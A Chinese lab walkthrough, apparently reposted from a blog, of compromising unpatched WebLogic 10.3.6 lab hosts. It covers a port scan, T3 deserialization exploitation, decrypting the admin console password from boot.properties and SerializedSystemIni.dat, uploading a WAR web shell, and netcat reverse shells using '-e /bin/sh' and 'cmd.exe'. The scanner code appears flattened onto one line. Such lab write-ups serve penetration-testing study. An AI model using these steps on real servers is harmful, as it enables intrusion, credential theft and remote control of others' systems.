1.?攻擊機(jī)windows10 192.168.2.104

2.?靶機(jī)ip:

　　192.168.2.109(linux Ubantu)

　　192.168.2.111(windows2008R264位)

第一步：啟動(dòng)靶機(jī)服務(wù)

分別為linux和windows

windows環(huán)境搭建：

　　鏈接：https://pan.baidu.com/s/16KyYb1v1rP9uJ6-5MBotVw
　　提取碼：9ti4

第二步：發(fā)現(xiàn)weblogic服務(wù)

當(dāng)我們擁有客戶授權(quán)的情況下，一般采取nmap,masscan甚至是Python自己編寫的端口掃描工具，各有優(yōu)缺。

網(wǎng)上開源很多，這里從網(wǎng)上拿來一款開源的掃描器（基于python2）。

代碼如下：

# -*- coding: utf-8 -*-import optparsefrom threading import *from socket import *screenLock=Semaphore(value=1)def connScan(tgtHost,tgtPort):try:connSkt = socket(AF_INET,SOCK_STREAM)connSkt.connect((tgtHost,tgtPort))connSkt.send('ViolentPython\r\n')results=connSkt.recv(100)screenLock.acquire()#打印前的加鎖操作。print ('[+.+] %d/tcp 開啟'% tgtPort+' '+str(results)).decode('UTF-8').encode('GBK')# print ('[+.+] '+str(results))connSkt.close()except:screenLock.acquire()print ("[-.-] %s/tcp 關(guān)閉"%tgtPort).decode('UTF-8').encode('GBK')finally:screenLock.release()#終止阻塞其他線程前需要執(zhí)行的代碼。connSkt.close()def portScan(tgtHost,tgtPorts):try:tgtIP=gethostbyname(tgtHost)except:print ("[-.-] 報(bào)告老大不能解析目標(biāo) '%s': 未知目標(biāo)"%tgtHost).decode('UTF-8').encode('GBK')returntry:tgtName=gethostbyaddr(tgtIP)print ('\n[+.+] 已經(jīng)獲得目標(biāo)地址:'+tgtName[0]).decode('UTF-8').encode('GBK')except:print ('\n[+.+] 已經(jīng)獲得目標(biāo)地址:'+tgtIP).decode('UTF-8').encode('GBK')setdefaulttimeout(1)for tgtPort in tgtPorts:t=Thread(target=connScan,args=(tgtHost,int(tgtPort)))#多線程t.start()def main():print ("皮皮蝦正在探路請耐心等待...").decode('UTF-8').encode('GBK')parser=optparse.OptionParser('usage %prog -H' +'<target host> -p <target port>')parser.add_option('-H',dest='tgtHost',type='string',help='specify target host')parser.add_option('-P',dest='tgtPort',type='string',help='specify target post')(options,args)=parser.parse_args()tgtHost = options.tgtHosttgtPorts = str(options.tgtPort).split(',')if (tgtHost==None)|(tgtPorts[0]==None):print ('[-.-] 老大你忘了輸入目標(biāo)地址和端口啦.').decode('UTF-8').encode('GBK')exit(0)portScan(tgtHost,tgtPorts)if __name__ == '__main__':print ("歡迎使用本掃描器，我是皮皮蝦").decode('UTF-8').encode('GBK')main()

具體編寫指南可以參考原文鏈接，適合剛開始學(xué)習(xí)python的朋友們

https://bbs.ichunqiu.com/thread-40994-1-1.html

掃描結(jié)果為關(guān)閉，換個(gè)端口試試

為什么為造成這種情況呢，分析原因：

可能因?yàn)槲覀冞@個(gè)py版端口掃描是調(diào)用的socket模塊，給端口發(fā)送一些垃圾數(shù)據(jù)，如果服務(wù)端返回?cái)?shù)據(jù)才代表我們這個(gè)端口開放，所以7001端口沒有給我們想要的數(shù)據(jù)，腳本就認(rèn)為它沒有開放。

祭出我們強(qiáng)大的Nmap

發(fā)現(xiàn)我們服務(wù)器靶機(jī)確實(shí)是開放了7001端口的，^…^。

第三步：對weblogic服務(wù)滲透的思路

發(fā)現(xiàn)weblogic服務(wù)，第一反應(yīng)是常見的能getshell的漏洞

比如后臺弱口令，密碼是base64編碼的，可以用burpsuite增加編碼參數(shù)，也可以用網(wǎng)上開源的一些工具進(jìn)行爆破，然后war包部署拿shell。

再比如對weblogic的T3協(xié)議，反序列化命令執(zhí)行，直接執(zhí)行系統(tǒng)命令。

像目錄樣例操縱和拒絕服務(wù)這些雞肋的漏洞我們這暫且不談。這個(gè)靠的是滲透經(jīng)驗(yàn)，就像上次參加一個(gè)眾測，網(wǎng)站出現(xiàn)了action結(jié)尾的網(wǎng)址時(shí)，立馬直接struts2命令執(zhí)行掃了一下直接getshell菜刀連上，高危漏洞吧，當(dāng)然了，跟大佬們一起挖洞眾測，這么簡單的漏洞，比的就是速度了，后面有空會分享一些挖洞的經(jīng)驗(yàn)，這里暫且不提。

第四步：對weblogic服務(wù)的滲透

我們這里安裝的weblogic是10.3.6，沒有打補(bǔ)丁，也沒有禁用t3協(xié)議。我們可以使用工具進(jìn)行反序列化利用。

（windows）

(linux)

然后執(zhí)行一系列命令查看我們?nèi)肭职袡C(jī)的環(huán)境

?

因?yàn)槭前袡C(jī)，直接給的administrator權(quán)限，也開放了3389端口，當(dāng)然了，在實(shí)戰(zhàn)過程中，我一開始很少連接3389上去，不安全也不可靠。

常規(guī)套路，net user增加用戶，給權(quán)限等，注意如果不是公網(wǎng)的服務(wù)器，Web服務(wù)端口是映射出來的化，我們這邊還需要給我們自己這邊的攻擊機(jī)彈個(gè)shell,有很多工具，這里用瑞士軍刀演示。

因?yàn)槭莣indows我們先上傳瑞士軍刀到服務(wù)器上，然后使用命令，轉(zhuǎn)發(fā)cmd到我們的攻擊機(jī)上。從weblogic反序列化得到的執(zhí)行權(quán)限無法反彈，所以我們需要先上傳一個(gè)大馬來執(zhí)行命令。因?yàn)槭前袡C(jī)并沒有部署web環(huán)境，我們再來看控制臺。?

控制臺密碼在目錄

C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties

得到了加密的用戶密碼：

我們開始破解它

第五步：破解weblogic控制臺密碼

jdk安裝說明：

https://www.cnblogs.com/eagle6688/p/7873477.html

破解工具：

https://codeload.github.com/NetSPI/WebLogicPasswordDecryptor/zip/master

插件:

http://repo2.maven.org/maven2/org/bouncycastle/bcprov-ext-jdk16/1.46/bcprov-ext-jdk16-1.46.jar

將插件復(fù)制到目錄

C:\Program Files\Java\jdk1.8.0_201\jre\lib\ext（jdk環(huán)境）

破解 weblogic 控制臺密碼需要 2 個(gè)條件

SerializedSystemIni.dat 密鑰文件

(c:\Oracle\Middleware\user_projects\domains\base_domain\security\SerializedSystem?Ini.dat)

boot.properties 控制臺用戶名和密碼

(C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\security\boot.properties)?

編譯下載的破解文件

Javac WebLogicPasswordDecryptor.java

破解

記住 破解的時(shí)候java和javac 版本一定要一樣，如果是后面新安裝的java和之前的java會沖突，需要到系統(tǒng)變量中修改一下，否則會出現(xiàn)下圖的報(bào)錯(cuò)

破解成功之后的

賬號：weblogic

密碼：weblogic123

原來是弱口令，嘿嘿。所以大家下次注意，遇到這種控制臺，第一反應(yīng)就是去手動(dòng)嘗試一些弱口令。當(dāng)然也可以使用暴力破解

可以使用python腳本:

https://github.com/b4zinga/Explib/blob/master/weblogic.py

有了賬號密碼，就是常規(guī)套路部署war包了。

/**/

制作war包大馬,把大馬以zip格式壓縮然后重命名為xxx.war即可

1、登錄控制臺(以Linux靶機(jī)為例)

訪問登陸控制臺

http://192.168.43.22:7001/console

選擇上傳文件

上傳我們制作的war包大馬

上傳的路徑

然后一直下一步

激活更改

選擇剛部署的項(xiàng)目啟動(dòng)

隨后訪問http://192.168.43.22:7001/cmd/cmd.jsp即可打開大馬

（linux）

(windows)

第六步：彈shell

在windows下：

靶機(jī)執(zhí)行：

nc.exe -l -p 8888 -t -e cmd.exe?

本機(jī)執(zhí)行：

nc.exe -nvv 192.168.2.111 8888

在linux下：

靶機(jī)執(zhí)行：

nc 192.168.2.104 8888 -e /bin/sh

本機(jī)執(zhí)行：

nc.exe -lvnp 8888

我們看到-e參數(shù)報(bào)錯(cuò)了這是因?yàn)?/p>

Ubuntu上默認(rèn)安裝的是netcat-openbsd,而不是經(jīng)典的netcat-traditional

sudo apt-get -y install netcat-traditional

然后sudo update-alternatives –config nc,選擇2

?

Linux靶機(jī)執(zhí)行:nc -vlp 8888 -e /bin/bash

本機(jī)執(zhí)行：nc.exe 192.168.2.109 8888

即可成功彈shell?

第七步：橫向滲透

用的比較多的是proxifier 正向代理，下一篇文件見。

*本文原創(chuàng)作者：zhukaiang7

轉(zhuǎn)載于:https://www.cnblogs.com/Fluorescence-tjy/p/10341525.html

總結(jié)

以上是生活随笔為你收集整理的Web渗透实验：基于Weblogic的一系列漏洞的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。